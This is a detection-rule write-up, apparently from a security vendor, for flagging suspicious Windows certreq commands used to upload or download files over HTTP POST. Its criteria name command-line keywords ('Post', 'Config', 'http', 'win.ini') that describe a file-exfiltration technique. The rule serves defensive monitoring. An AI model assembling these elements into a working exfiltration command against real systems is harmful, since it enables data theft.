Suspicious Certreq Command to Download or Upload

Rule added on 30th April, 2024

Rule type:

Correlation

Rule description:

The certreq command is used to perform certification management tasks such as requesting, accepting, installing and managing certificates. Attackers can misuse this command to perform an unauthorized download or upload of certificate-related files to a remote URL or server by making an HTTP POST request.

Impact:

It can impact the organizations in the following ways:

  • Data breaches
  • Encryption of sensitive data
  • Data exfiltration
  • Operational disruption

Data source:

Windows:

Required configuration: The rules is based on the process creation and termination. Prerequisites required are installing and configuring Sysmon, enabling audit process creation audit policy, and the command line auditing.

Relevant MITRE ATT&CK techniques and tactics:

Tactics: TA0005- Defense Evasion

Techniques: T1027- Obfuscated Files or Information

Criteria:

(Original file name contains certreq) OR ( Command line contains "Post" AND Command line contains "Config" AND Command line contains "http" AND Command line contains "win.ini" )

This rule is triggered when the original file name contains certreq or command line contains 'Post, 'Config' and 'http' and 'win.ini' .'

Attackers may use Certreq command to perform unauthorized upload or download of certificate related files.

'Post'- The POST method is used for sending data to a server, indicating a possible upload of files.

'Config'- This indicates the configuration settings passed to the command, which could be manipulated by attackers to perform suspicious activities.

'http'- This indicates the HTTP protocol.

'win.ini'- This is a Windows system file which stores basic information at the time of booting process.

When to enable this rule:

Enabling this rule will help you meet the security standards' requirements listed below:

Security standards (NIST CSF 2.0):

DE.CM-09: Computing hardware and software, runtime environments, and their data are monitored to find potentially adverse events

When this rule is triggered, you're notified when a suspicious Certreq command has being executed. This enables you to review access and permissions, take corrective actions, and monitor the use of Certreq command.

Known false positives: This event may be generated by administrators for certification management tasks such as requesting, updating, or removing digital certificates on Windows.

Next steps:

When this alert is triggered, the following measures can be implemented:

  • Identification: Identify the alert as a new incident or within an ongoing incident.
  • Analysis: Analyze the impact and extent of the compromise to comprehend the severity of the attack.
  • Response: Respond promptly by initiating an automated workflow to cease the malicious process.
  • Deploy Access Controls: Implement access controls and permissions to restrict the execution of Certreq by unauthorized users.